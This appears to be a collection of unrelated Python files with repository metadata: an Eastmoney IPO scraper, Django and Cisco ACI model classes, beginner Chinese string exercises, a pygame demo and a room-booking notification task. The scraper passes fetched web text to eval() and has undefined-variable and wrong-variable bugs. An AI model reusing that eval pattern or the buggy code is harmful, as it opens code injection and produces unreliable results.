import time
from bs4 import BeautifulSoup
base_url = 'https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx?'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
def date_gen():
r = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',headers=headers)
r.encoding = 'gbk'
soup = BeautifulSoup(r.text,'html.parser')
dateList = [i.text for i in soup.findAll('option')]
yield dateList
def get_eastmoneyData(dateList):
query = {'type': 'NS',
'sty' : 'NSFR',
'st' : '1',
'sr' : '-1',
'p' : '1',
'ps' : '5000',
'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt' : '1',
'rt' : '53721774'
}
main_data = []
for date in dateList:
query['fd'] = dateList
# start = datetime.strptime('2017-01-05','%Y-%m-%d').date()
# while start < datetime.today().date():
# query['fd'] = start
url = base_url + urlencode(query)
# yield url
# start += timedelta(days=7)
rs = requests.get(url,headers=headers)
if rs.text == '':
continue
js = rs.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(js[:-1])
main_data.extend(data)
time.sleep(2)
temp = [i.split(',') for i in main_data]
columns = ['会计师事务所','保荐代表人','保荐机构','xxx','律师事务所','日期','所属行业','板块','是否提交财务自查报告',
'注册地','类型','机构名称','签字会计师','签字律师','时间戳','简称']
df = pd.DataFrame(temp,columns=columns)
df['文件链接'] = df['时间戳'].apply(lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf")
df = df[['机构名称', '类型', '板块', '注册地', '保荐机构','保荐代表人', '律师事务所', '签字律师','会计师事务所',
'签字会计师', '是否提交财务自查报告', '所属行业','日期','xxx', '时间戳', '保荐机构','文件链接']]
df = df[df['板块'] != '创业板']
df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_raw_data.csv',index=False,encoding='utf-8-sig')
return df
def get_meetingData():
meetingInfo = []
for marketType in ['2','4']: # 2 为主板, 4 为中小板
query = {'type': 'NS',
'sty' : 'NSSH',
'st' : '1',
'sr' : '-1',
'p' : '1',
'ps' : '5000',
'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt' : marketType,
'rt' : '53723990'
}
url = base_url + urlencode(query)
rss = requests.get(url,headers=headers)
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
meetingInfo.extend(data)
temp = [j.split(',') for j in meetingInfo]
columns = ['时间戳','yyy','公司代码','机构名称','详情链接','申报日期','上会日期','申购日期','上市日期','9','拟发行数量','发行前总股本','发行后总股本','13','占发行后总股本比例','当前状态','上市地点','主承销商','承销方式','发审委委员','网站','简称']
df = pd.DataFrame(temp,columns=columns)
df['文件链接'] = df['时间戳'].apply(lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf")
df['详情链接'] = df['公司代码'].apply(lambda x: "data.eastmoney.com/xg/gh/detail/" + x + ".html")
df = df[['机构名称', '当前状态', '上市地点', '拟发行数量', '申报日期','上会日期', '申购日期', '上市日期', '主承销商','承销方式', '9', '发行前总股本','发行后总股本','13','占发行后总股本比例','发审委委员','网站','公司代码','yyy','时间戳', '简称', '详情链接','文件链接']]
df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_meeting.csv'.format(i),index=False,encoding='utf-8-sig')
return df
def get_zzscData(dateList):
zzsc_dict = {}
for date in dateList:
query = {'type': 'NS',
'sty' : 'NSSE',
'st' : '1',
'sr' : '-1',
'p' : '1',
'ps' : '500',
'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt' : '4',
'stat':'zzsc',
'fd' : date,
'rt' : '53727636'
}
url = base_url + urlencode(query)
rss = requests.get(url,headers=headers)
if rss.text == 'var IBhynDx={pages:0,data:[{stats:false}]}':
continue
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
for i in data:
name = i.split(',')[1]
if name not in zzsc_dict:
zzsc_dict[name] = i.split(',')[2]
else:
continue
time.sleep(2)
zzsc = pd.DataFrame(zzsc_dict.items(),columns = ['机构名称','决定终止审查时间'])
zzsc.to_csv('C:/Users/chen/Desktop/IPO_info/eastmoney_zzsc.csv',encoding='utf-8-sig',index=False)
return zzsc
def eastmoney_cleanUP():
east_money = pd.read_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/easymoney_raw_data.csv')
east_money.replace({'是否提交财务自查报告':' '},'是')
east_money.replace({'是否提交财务自查报告':'不适用'},'是')
east_money['机构名称'] = east_money['机构名称'].replace(r'\*','',regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'股份有限公司','',regex=True)
east_money = east_money[east_money['板块'] != '创业板']
# east_money.sort_values(['机构名称','类型','受理日期'],ascending=[True, True,True],inplace=True)
# east_money.to_csv('C:/Users/chen/Desktop/IPO_info/pre_cleab.csv',encoding='utf-8-sig',index=False)
east_money.drop_duplicates(subset =['机构名称','类型'], keep = 'first', inplace = True)
east_money.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_cleaned.csv',encoding='utf-8-sig',index=False)
return east_money
def gen_finalDate(eastmoney):
ekk = east_money.values.tolist()
abc = {}
for i in ekk:
if i[0] not in abc:
abc[i[0]] = {'机构名称':i[0],
'预先披露':'',
'已反馈':'',
'预先披露更新日期':'',
'其他':'',
'通过发审会日期':'',
'终止审查日期':'',
'保荐机构':i[4],
'律师事务所':i[6],
'会计师事务所':i[8],
'板块':i[2],
'简称':i[15]
}
if i[1] == '已受理':
abc[i[0]]['预先披露'] = i[12]
elif i[1] == '已反馈':
abc[i[0]]['已反馈'] = i[12]
elif i[1] == '预先披露更新':
abc[i[0]]['预先披露更新日期'] = i[12]
elif i[1] == '已通过发审会':
abc[i[0]]['通过发审会日期'] = i[12]
else:
if i[1] == '已受理':
abc[i[0]]['预先披露'] = i[12]
elif i[1] == '已反馈':
abc[i[0]]['已反馈'] = i[12]
elif i[1] == '预先披露更新':
abc[i[0]]['预先披露更新日期'] = i[12]
elif i[1] == '已通过发审会':
abc[i[0]]['通过发审会日期'] = i[12]
elif i[1] in ['已提交发审会讨论,暂缓表决','已上发审会,暂缓表决','中止审查']:
abc[i[0]]['其他'] = {i[1]:i[12]} | [
"chenjiajun.jason@outlook.com"
] | chenjiajun.jason@outlook.com |
65c9f4d94735b5d8ec3bd25b297f2d107ba78d57 | c83e356d265a1d294733885c373d0a4c258c2d5e | /mayan/apps/documents/models/trashed_document_models.py | b01b915df45c786b9f2bae689388dabfd9ca7183 | [
"Apache-2.0"
] | permissive | TrellixVulnTeam/fall-2021-hw2-451-unavailable-for-legal-reasons_6YX3 | 4160809d2c96707a196b8c94ea9e4df1a119d96a | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | refs/heads/master | 2023-08-21T23:36:41.230179 | 2021-10-02T03:51:12 | 2021-10-02T03:51:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | from mayan.apps.events.classes import EventManagerMethodAfter
from mayan.apps.events.decorators import method_event
from ..events import event_trashed_document_restored
from ..managers import TrashCanManager
from .document_models import Document
__all__ = ('TrashedDocument',)
class TrashedDocument(Document):
objects = TrashCanManager()
class Meta:
proxy = True
@method_event(
event_manager_class=EventManagerMethodAfter,
event=event_trashed_document_restored,
target='self',
)
def restore(self):
self.in_trash = False
# Skip the edite event at .save().
self._event_ignore = True
self.save()
| [
"79801878+Meng87@users.noreply.github.com"
] | 79801878+Meng87@users.noreply.github.com |
f320319b03d47c6fb1820eed7a74123132d8126f | b059c2cf1e19932abb179ca3de74ced2759f6754 | /S20/day03/02作业.py | 56e199fe792866eaf71cd248d1ce258e423277ee | [] | no_license | Lwk1071373366/zdh | a16e9cad478a64c36227419d324454dfb9c43fd9 | d41032b0edd7d96e147573a26d0e70f3d209dd84 | refs/heads/master | 2020-06-18T02:11:22.740239 | 2019-07-10T08:55:14 | 2019-07-10T08:55:14 | 196,130,277 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,842 | py | # 有变量name = "aleX leNb" 完成如下操作:
# 1. 移除 name 变量对应的值两边的空格,并输出处理结果
#
# name ='aleX leNB'
# print(name.strip())
# 2. 移除name变量左边的"al"并输出处理结果
# name ='aleX leNB'
# print(name[2:])
# 移除name变量右⾯的"Nb",并输出处理结果
# name='aleX leNB'
# print(name[0:7])
# 移除name变量开头的a"与最后的"b",并输出处理结果
# name='aleX leNB'
# # print(name[1:8])
# 判断 name 变量是否以 "al" 开头,并输出结果
# name = 'aleX leNB'
# # print(name.startswith('al'))
# 判断name变量是否以"Nb"结尾,并输出结果
# name = 'aleX leNB'
# print(name.endswith('NB'))
# 将 name 变量对应的值中的 所有的"l" 替换为 "p",并输出结果
# name = 'aleX leNB'
# print(name.replace('l','p'))
# 将name变量对应的值中的第⼀个"l"替换成"p",并输出结果
# print(name.replace('l','p'))
# 将 name 变量对应的值根据 所有的"l" 分割,并输出结果。
# print(name.split('l'))
# 将name变量对应的值根据第⼀个"l"分割,并输出结果。
# print(name.split('l',1))
# 将 name 变量对应的值变⼤写,并输出结果
# print(name.upper())
# 将 name 变量对应的值变⼩写,并输出结果
# print(name.lower())
# 将name变量对应的值⾸字⺟"a"⼤写,并输出结果
# print(name.capitalize())
# 判断name变量对应的值字⺟"l"出现⼏次,并输出结果
# . 从name变量对应的值中找到"N"对应的索引(如果找不到则报错),并输出结果
# print(name.find('N'))
# print(name.index('N'))
# 从name变量对应的值中找到"X le"对应的索引,并输出结果
# print(name.find('X le'))
# 请输出 name 变量对应的值的第 2 个字符?
# name = 'aleX leNB'
# 请输出 name 变量对应的值中 "e" 所在索引位置(两个e都找)?
# print(name.find('e'))
# 有字符串s = "123a4b5c"
# a.通过对s切⽚形成新的字符串s1,s1 = "123"
# b. 通过对s切⽚形成新的字符串s2,s2 = "a4b"
# c. 通过对s切⽚形成新的字符串s3,s3 = "1345"
# d. 通过对s切⽚形成字符串s4,s4 = "2ab"
# e. 通过对s切⽚形成字符串s5,s5 = "c"
# # f. 通过对s切⽚形成字符串s6,s6 = "ba2"
# s='123a4b5c'
# s1=print(s[0:3])
# s2=print(s[3:6])
# s3=print(s[0:7:2])
# s4=print(s[1:6:2])
# s5=print(s[-1])
# s6=print(s[-3:-8:-2])
#
# 使⽤while和for循环分别打印字符串s="asdfer"中每个元素
# s='asdfer'
#
# for i in s:
# print(i)
#
#
#
# count = 0
# while count < len(s):
# print(s[count])
# count += 1
#
# count =0
# while count<len(s):
# print(s[count])
# count += 1
# 使⽤for循环对s="asdfer"进⾏循环,但是每次打印的内容都是"asdfer"
# s ='asdfer'
# for i in s :
# print(s)
# 使⽤for循环对s="abcdefg"进⾏循环,每次打印的内容是每个字符加上sb, 例如:
# asb, bsb,csb,...gsb
# s ='abcdefg'
# for i in s:
# i = i+"sb"
# print(i)
# 使⽤for循环对s="321"进⾏循环,打印的内容依次是:"倒计时3秒","倒计时2
# 秒","倒计时1秒","出发
# s= '321'
# for i in s:
# if i == '3':
# print('倒计时3S')
# if i == '2':
# print('倒计时2S')
# if i == '1':
# print('倒计时1S')
# else:print('出发')
#
# 计算 1 - 2 + 3 ... + 99 中除了88以外所有数的总和
x= 1
result = 0
while x <= 99:
if x % 2 == 1:
result += x
else :
if x != 88:
result -= x
x += 1
print(result)
x=1
s=0
while x <=99:
if x % 2 ==1 :
s = s + x
else:
if x != 88:
s = s - x
x= x+1
print(s)
# 判断⼀句话是否是回⽂. 回⽂: 正着念和反着念是⼀样的. 例如, 上海 ⾃来⽔来⾃海上
# a ="上海自来水来自海上"
# content = input("请输⼊内容:") ⽤户输⼊:5+9或5+ 9或5 + 9,然后进⾏分
# 割再进⾏计算
#
# sum = 0
# content = input('请输入内容:').strip()
# print(content)
# s = content.split('+')
# print(s)
# for i in s:
# sum += int(i)
# print(sum)
# 计算⽤户输⼊的内容中有⼏个整数(以个位数为单位)。
# 如:content = input("请输⼊内容:") # 如fhdal234slfh98769fjdla
#
# content = input('请输入内容:')
# count = 0
# for i in content:
# if i.isdigit():
# count += 1
# else:continue
# print(count)
# 如:content = input("请输⼊内容:") ⽤户输⼊:5+9+6 +12+ 13,然后进⾏分割
# 再进⾏计算。
# sum = 0
# content = input('请输入:')
# count = content.rsplit('+')
# print(count)
# for i in count:
# sum = sum +int(i)
# print(sum)
#
# content =input('输入数字')
# count = 0
# for i in content:
# if i.isdigit():
# count +=1
# else:continue
# print(count)
#
# 写代码,完成下列需求:(升级题)
# ⽤户可持续输⼊(⽤while循环),⽤户使⽤的情况:
# 输⼊A,则显示⾛⼤路回家,然后在让⽤户进⼀步选择:
# 是选择公交⻋,还是步⾏?
# 选择公交⻋,显示10分钟到家,并退出整个程序。
# 选择步⾏,显示20分钟到家,并退出整个程序。
# 输⼊B,则显示⾛⼩路回家,并退出整个程序。
# 输⼊C,则显示绕道回家,然后在让⽤户进⼀步选择:
# 是选择游戏厅玩会,还是⽹吧?
# 选择游戏厅,则显示 ‘⼀个半⼩时到家,爸爸在家,拿棍等你。’并让其重新输⼊
# A,B,C选项。
# 选择⽹吧,则显示‘两个⼩时到家,妈妈已做好了战⽃准备。’并让其重新输⼊
# A,B,C选项
# 输⼊⼀个字符串,要求判断在这个字符串中⼤写字⺟,⼩写字⺟,数字, 其它字符
# 共出现了多少次,并输出出来
# s =input('请输入:')
# count = 0
# for i in s :
# if i.islower():
# count += 1
# print(count)
# if i.isdigit():
# count += 1
# print(count)
# if i.isupper():
# count += 1
# print(count)
# if i.isalnum():
# count += 1
# print(count)
# 制作趣味模板程序需求:等待⽤户输⼊名字、地点、爱好,根据⽤户的名字和爱好进
# ⾏任意现实 如:敬爱可亲的xxx,最喜欢在xxx地⽅⼲xxx
# f ='敬爱可亲的{},最喜欢在{}的{}'
# name = input('姓名')
# hobby = input('爱好') formatde 应用
# addr =input('地点')
#
# print(f.format(name,hobby,addr))
# a = '敬爱的{},喜欢{}干{}'
# name = input('姓名')
# hobby=input('爱好')
# addr=input('地点')
#
# print(a.format(name,hobby,addr))
# 输⼊⼀个字符串,要求判断在这个字符串中⼤写字⺟,⼩写字⺟,数字, 其它字符
# 共出现了多少次,并输出出来
# upp=0
# low=0
# dig=0
# oth=0
# s = input('内容')
# for i in s :
# if i.upper() :
# upp+=1
# if i.lower():
# low+=1
# if i.isdigit() :
# dig+=1
# else:
# oth+=1
# print('大写{},小写{},数字{},其他{}'.format(upp,low,dig,oth))
#
# counter_upper = 0
# counter_lower = 0
# counter_digit = 0
# counter_other = 0
#
#
#
# s = input("input a string:")
# for x in s:
# if x.isdigit():
# counter_digit += 1
# elif x.isupper():
# counter_upper += 1
# elif x.islower():
# counter_lower += 1
# else:
# counter_other += 1
#
# print("大写:{},小写:{},数字:{},其他{}".format(counter_other,counter_upper,counter_digit,counter_lower))
#
# counter_upper = 0
# counter_lower = 0
# counter_digit = 0
# counter_other = 0
#
# s = input('内容:')
# for i in s:
# if i.upper():
# counter_upper += 1
# elif i.lower():
# counter_lower += 1
# elif i.isdigit():
# counter_digit += 1
# else:
# counter_other += 1
# print('大写{},小写{}, 数字{},其他{}'.format(counter_upper,counter_lower,counter_digit,counter_other))
| [
"1071373366@qq.com"
] | 1071373366@qq.com |
bd5492b6bec1f6e3280cbd6bf2c71e883c29edac | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf/gsn-edf_ut=3.5_rd=0.5_rw=0.04_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=69/sched.py | 921e6e054d0d3ab3a119fcc51f90853d86f0b4cf | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | -X FMLP -Q 0 -L 3 103 300
-X FMLP -Q 0 -L 3 89 300
-X FMLP -Q 0 -L 3 81 400
-X FMLP -Q 1 -L 2 77 300
-X FMLP -Q 1 -L 2 64 400
-X FMLP -Q 2 -L 2 59 200
-X FMLP -Q 2 -L 2 54 175
-X FMLP -Q 3 -L 1 42 250
-X FMLP -Q 3 -L 1 39 250
32 150
29 150
28 175
28 125
26 175
24 250
20 300
16 150
13 125
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
06fde46f14519931629dcd804ce8b5d896403fd6 | cef574422ec96cc972733812f78b8f777a934326 | /first/drow_circle.py | 976d039d5df39e66cf4054eae764bfd8de493bd7 | [] | no_license | ducksfrogs/pyGame2 | 6aa1f01743fc3bd8df4149f090a5ac63d72686a9 | 17fc545fa66a2d091127cfd4d5779b1e5d3385e4 | refs/heads/main | 2023-02-25T13:42:33.719568 | 2021-01-31T02:49:11 | 2021-01-31T02:49:11 | 323,764,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | """Draw circle """
import sys
import pygame
from pygame.locals import QUIT, Rect
pygame.init()
SURFACE = pygame.display.set_mode((400,300))
FPSCLOCK = pygame.time.Clock()
def main():
""" Main routine """
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
SURFACE.fill((255,255,255))
pygame.draw.circle(SURFACE, (255,0,0), (50,50),20)
pygame.draw.circle(SURFACE, (255,0,0), (150,50), 20, 10)
pygame.draw.circle(SURFACE, (0,255,0), (50,150), 10)
pygame.draw.circle(SURFACE, (0,255,0), (150,150), 20)
pygame.display.update()
FPSCLOCK.tick(3)
if __name__ == '__main__':
main()
| [
"ma_yamaki@yahoo.com"
] | ma_yamaki@yahoo.com |
c11bc856f2ea6a25f92cda9810b7bb119e56cd2a | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/syslog/deststate.py | 94dfe225d2349b2697c4c964c150c674e036028f | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 7,070 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class DestState(Mo):
"""
"""
meta = ClassMeta("cobra.model.syslog.DestState")
meta.moClassName = "syslogDestState"
meta.rnFormat = "destst-%(name)s"
meta.category = MoCategory.REGULAR
meta.label = "syslog Destination State"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x800000000000001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Inst")
meta.childClasses.add("cobra.model.fault.Counts")
meta.childClasses.add("cobra.model.health.Inst")
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childClasses.add("cobra.model.syslog.LogMsg")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Counts", "fltCnts"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Inst", "fault-"))
meta.childNamesAndRnPrefix.append(("cobra.model.health.Inst", "health"))
meta.childNamesAndRnPrefix.append(("cobra.model.syslog.LogMsg", "msg-"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.syslog.RemoteDest")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Comp")
meta.rnPrefixes = [
('destst-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5582, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "ip", "ip", 16267, PropCategory.REGULAR)
prop.label = "ip address"
prop.isImplicit = True
prop.isAdmin = True
prop.regex = ['^(?=.{0,255}$)[0-9A-Za-z:\\[\\]](\\[{0,1})(?:(?:[0-9A-Za-z]|-|:){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-|:){0,61}[0-9A-Za-z])?)*\\.?(\\]{0,1})$']
meta.props.add("ip", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "monPolDn", "monPolDn", 16273, PropCategory.REGULAR)
prop.label = "Monitoring policy attached to this observable object"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("monPolDn", prop)
prop = PropMeta("str", "name", "name", 16268, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.range = [(1, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "operState", "operState", 16265, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "unknown"
prop._addConstant("available", "available", 1)
prop._addConstant("errored", "errored", 2)
prop._addConstant("unknown", "unknown", 0)
meta.props.add("operState", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "totalBufferedMsgs", "totalBufferedMsgs", 17622, PropCategory.REGULAR)
prop.label = "total buffered messages"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("totalBufferedMsgs", prop)
prop = PropMeta("str", "totalDroppedMsgs", "totalDroppedMsgs", 17623, PropCategory.REGULAR)
prop.label = "total drooped messages"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("totalDroppedMsgs", prop)
prop = PropMeta("str", "vrfId", "vrfId", 16266, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("vrfId", prop)
meta.namingProps.append(getattr(meta.props, "name"))
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
def __init__(self, parentMoOrDn, name, markDirty=True, **creationProps):
namingVals = [name]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
c3b4cb6c2d7cbc8e5894e89e5b6a4b7727329f4d | 80810054516ddc3fd93e916de4bf7e3e07d871b0 | /1-books/book6_Python核心编程(第3版)/网络编程/functools_cmp_to_key.py | d16e6e1763906c6fdd78baf903356b25293a6ea7 | [] | no_license | TinyHandsome/BookStudy | df9ca668f2dd1b51b1e364c22bc531394a03eeae | 69c9018bb70893f74a44e4df9f3d3e39467de3f6 | refs/heads/master | 2023-09-04T03:06:43.918259 | 2023-09-01T04:27:01 | 2023-09-01T04:27:01 | 184,217,837 | 18 | 17 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | x = ['hello', 'world', 'ni']
x.sort(key=len)
print(x)
from functools import cmp_to_key
ll = [9, 2, 23, 1, 2]
print(sorted(ll, key=cmp_to_key(lambda x, y: y - x)))
print(sorted(ll, key=cmp_to_key(lambda x, y: x - y)))
| [
"694317828@qq.com"
] | 694317828@qq.com |
1ec7f1e63501bcd0990480bde271f6da0909fd06 | 20f951bd927e4e5cde8ef7781813fcf0d51cc3ea | /fossir/modules/rb/tasks.py | a602ffdd2659a0af0aad35e4d26284196c247028 | [] | no_license | HodardCodeclub/SoftwareDevelopment | 60a0fbab045cb1802925d4dd5012d5b030c272e0 | 6300f2fae830c0c2c73fe0afd9c684383bce63e5 | refs/heads/master | 2021-01-20T00:30:02.800383 | 2018-04-27T09:28:25 | 2018-04-27T09:28:25 | 101,277,325 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,611 | py |
from __future__ import unicode_literals
from datetime import date, datetime
from itertools import groupby
from operator import attrgetter
from celery.schedules import crontab
from sqlalchemy.orm import contains_eager
from fossir.core.celery import celery
from fossir.core.config import config
from fossir.core.db import db
from fossir.modules.rb import logger, rb_settings
from fossir.modules.rb.models.reservation_occurrences import ReservationOccurrence
from fossir.modules.rb.models.reservations import RepeatFrequency, Reservation
from fossir.modules.rb.models.rooms import Room
from fossir.modules.rb.notifications.reservation_occurrences import notify_upcoming_occurrences
from fossir.util.console import cformat
def _make_occurrence_date_filter():
_default = rb_settings.get('notification_before_days')
_default_weekly = rb_settings.get('notification_before_days_weekly')
_default_monthly = rb_settings.get('notification_before_days_monthly')
notification_before_days_room = db.case({RepeatFrequency.WEEK.value: Room.notification_before_days_weekly,
RepeatFrequency.MONTH.value: Room.notification_before_days_monthly},
else_=Room.notification_before_days, value=Reservation.repeat_frequency)
notification_before_days_default = db.case({RepeatFrequency.WEEK.value: _default_weekly,
RepeatFrequency.MONTH.value: _default_monthly},
else_=_default, value=Reservation.repeat_frequency)
notification_before_days = db.func.coalesce(notification_before_days_room, notification_before_days_default)
days_until_occurrence = db.cast(ReservationOccurrence.start_dt, db.Date) - date.today()
return days_until_occurrence == notification_before_days
def _print_occurrences(user, occurrences, _defaults={}, _overrides={}):
if not _defaults or not _overrides:
_defaults.update({RepeatFrequency.WEEK: rb_settings.get('notification_before_days_weekly'),
RepeatFrequency.MONTH: rb_settings.get('notification_before_days_monthly'),
RepeatFrequency.NEVER: rb_settings.get('notification_before_days'),
RepeatFrequency.DAY: rb_settings.get('notification_before_days')})
_overrides.update({RepeatFrequency.WEEK: lambda r: r.notification_before_days_weekly,
RepeatFrequency.MONTH: lambda r: r.notification_before_days_monthly,
RepeatFrequency.NEVER: lambda r: r.notification_before_days,
RepeatFrequency.DAY: lambda r: r.notification_before_days})
print cformat('%{grey!}*** {} ({}) ***').format(user.full_name, user.email)
for occ in occurrences:
default = _defaults[occ.reservation.repeat_frequency]
override = _overrides[occ.reservation.repeat_frequency](occ.reservation.room)
days = default if override is None else override
days_until = (occ.start_dt.date() - date.today()).days
print cformat(' * %{yellow}{}%{reset} %{green}{:5}%{reset} {} {} {} \t %{blue!}{}%{reset} {} ({})').format(
occ.start_dt.date(), occ.reservation.repeat_frequency.name,
days,
default if override is not None and override != default else ' ',
days_until,
occ.reservation.id,
occ.reservation.room.full_name,
occ.reservation.room.id
)
def _notify_occurrences(user, occurrences):
notify_upcoming_occurrences(user, occurrences)
for occ in occurrences:
occ.notification_sent = True
if occ.reservation.repeat_frequency == RepeatFrequency.DAY:
future_occurrences_query = (occ.reservation.occurrences
.filter(ReservationOccurrence.start_dt >= datetime.now()))
future_occurrences_query.update({'notification_sent': True})
@celery.periodic_task(name='roombooking_occurrences', run_every=crontab(minute='15', hour='8'))
def roombooking_occurrences(debug=False):
if not config.ENABLE_ROOMBOOKING:
logger.info('Notifications not sent because room booking is disabled')
return
if not rb_settings.get('notifications_enabled'):
logger.info('Notifications not sent because they are globally disabled')
return
occurrences = (ReservationOccurrence.query
.join(ReservationOccurrence.reservation)
.join(Reservation.room)
.filter(Room.is_active,
Room.notifications_enabled,
Reservation.is_accepted,
Reservation.booked_for_id.isnot(None),
ReservationOccurrence.is_valid,
ReservationOccurrence.start_dt >= datetime.now(),
~ReservationOccurrence.notification_sent,
_make_occurrence_date_filter())
